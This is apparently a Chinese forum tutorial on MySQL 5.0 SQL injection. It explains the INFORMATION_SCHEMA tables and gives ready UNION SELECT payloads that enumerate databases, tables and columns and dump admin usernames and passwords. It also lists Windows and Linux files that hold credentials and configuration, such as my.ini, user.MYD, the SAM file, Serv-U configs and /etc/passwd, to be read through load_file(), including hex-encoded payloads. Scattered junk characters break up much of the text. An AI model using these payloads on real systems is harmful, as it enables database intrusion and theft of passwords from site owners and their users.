mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
8 E$ M7 M6 |5 U9 W0 B) g

# ?! n7 [' _5 ]
  o& e  o) f+ k  o5 S% \% H. \Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
+ ?/ d7 s6 N* N4 i+ s: y. N. n明。
% b1 l  E3 f. s& L0 F( F; |/ k5 |1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
/ ^4 E+ j2 q* ?- \/ G' S* Q# W. u- l9 j" ^|—字段：SCHEMA_NAME ->数据库名称

; d! Y! T1 l, Y* S/ t|TABLES ->存储表名
" ]: ?+ f0 Q7 E5 ]5 c; ]* ?|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
2 C9 y  P& l  i; {+ j+ u
|COLUMNS ->存储的字段名表
. [- x0 w: ^; a0 T|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称

' G; x$ J3 P& S3 h. Y# X0 J0 w#########################################################################
##

0×001 获取系统信息:
3 V4 l% \; J/ U) l# N# w
8 x( G6 n/ [( Bunion select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
  ~* E" V, Y8 }3 R+ t9 c/ L. D
/*

@@global.version_compile_os 获取系统版本
9 D2 ^& q* |% V  E
@@datadir 数据库路径
) @) b; }2 r& a2 |: f% }, {0 }database() 当前数据库名称
0x3c62723e 换行HEX值
3 R( r) D* j1 |
3 o* M6 `6 c8 T7 g3 m*/
6 b- v) `# p$ b: ?! H- W- M
+ C; X. S: l: q######################################################################
4 k: o3 G( A: O0 s$ J7 F/ [0 d
' |; I0 ^4 k/ J' o( A0×002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
! V! C, y2 _1 G$ R6 j1 einformation_schema.tables where table_schema=0x67617264656e /*
6 Z* B# L& j# A; ?( o/ e8 Z
) A8 b- C# x* b$ }/*

) A: ?* x% @6 U( I+ R7 M8 E1 \0x67617264656e 为当前数据库名

& E3 M+ F2 A0 T6 ~# ~group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/
" [; M$ W" k% N
! W; ?- z9 B  x( m+ P( _- K& s" g- H######################################################################

7 o: j2 T0 H! [0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
9 m% N! P7 z9 s! ~: Qinformation_schema.columns where table_name=0x61646d696e and


' U$ V5 p) M5 N; htable_schema=0x67617264656e limit 1 /*
6 N5 b- t2 N6 x1 u
1 B7 l" E; |8 R6 ^& H. e/*
' M- f+ d" o, N1 o5 w
0 ]4 |6 N- e1 x/ \; j! B4 ~group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表
4 S' ^2 ^! s7 G! j
9 I4 P0 [- B: Q! u0x67617264656e ->数据库名
6 Y! o. {5 H, ^; ^! [$ Q
- l- |' J4 q9 B*/
3 V5 |0 P- V% O& ?% p
6 l* w/ K; W* b$ Z/ k#####################################################################

0×004 获取数据

union select 1,2,3
6 r" S" R+ D6 c0 O,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
& c. y7 D* o, }$ E* {
union select 1,group_concat(id),group_concat(adname),4,5,group_concat
. F' _( |7 \% K! }(adpassword),6,7,8 from admin
" ]8 ?8 Z4 S7 e' ^+ f
1 I  a, `- {$ C) L/ q$ w/*
" Q; r: l, j7 f& U( H
( n* m$ o6 d  ?/ [+ s0 f0x3c62723e 换行符号HEX编码

7 {  K$ T7 O' D) ]7 Hgroup_concat 同时获得该字段所有数据

- O1 z% R3 P/ Z, p3 f" u*/
5 P% H6 ]  |. G1 J' Z

/ R# U% X! X$ `

$ a; V' ~7 ?$ o3 T0 ?' K
顺便添加一些mysql注入时非常有用的一些东西
; H; k8 z! g* L8 E% t- q3 s
简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

" F) {( `7 ^7 u( s$ M1:system_user() 系统用户名
2:user()        用户名
3:current_user()  当前用户名
0 G. s* b' ]4 z' J; k4:session_user()连接数据库的用户名
8 d1 R: e$ P. X, t' q! O5:database()    数据库名
6:version()     MYSQL数据库版本
! ]! P  r! Z' h9 d' X7 p- L" K6 ]7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
9 M7 O8 {$ D7 |. e5 Y- b, R9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
6 v) ?9 _# k5 n$ X7 h收集的一些路径：
7 b; O/ C  A  V$ n' rWINDOWS下:
! U; I1 o+ X( B9 z" z" k: qc:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
/ O) K6 H0 g5 {) gc:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
' M, ?! V& n( Kc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
) V( n  d/ e6 y9 D' x: ac:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
: j& M" ~: G* Y+ y4 E, n- Jc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.


c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
9 Z4 f  S# w; r3 g* ^7 b" n  t' ed:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
) X$ }" I0 Y0 o' h9 d! lC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

9 d7 e$ r) q. L: ALUNIX/UNIX下:
5 {8 H" n' }/ i4 T. l' ~! T( ?/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
3 [, M7 V& s% L+ @) c+ B! W/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
6 ]3 Q1 o7 ^  v8 J1 G- v  i/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
. ?7 e$ G; ~2 t1 C4 h4 W0 ~0 @/etc/issue
' f, m2 S2 E8 E4 w$ V" J/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
! U4 B/ @: k, ?$ e6 e/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
6 F. [% x% V0 I: m4 Q$ N( \/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
3 H  J" `& C: M/ B  F/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
) O* P/ z* q4 F+ F0 P+ S/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
' X9 O9 A: |* X. @' x/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
+ c) ?) r# i: e1 S/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
1 }' I* D, b1 W9 q) U/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
, N1 K$ E9 e9 x7 s2 Z上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

- D; o& R% c; h" y& n; \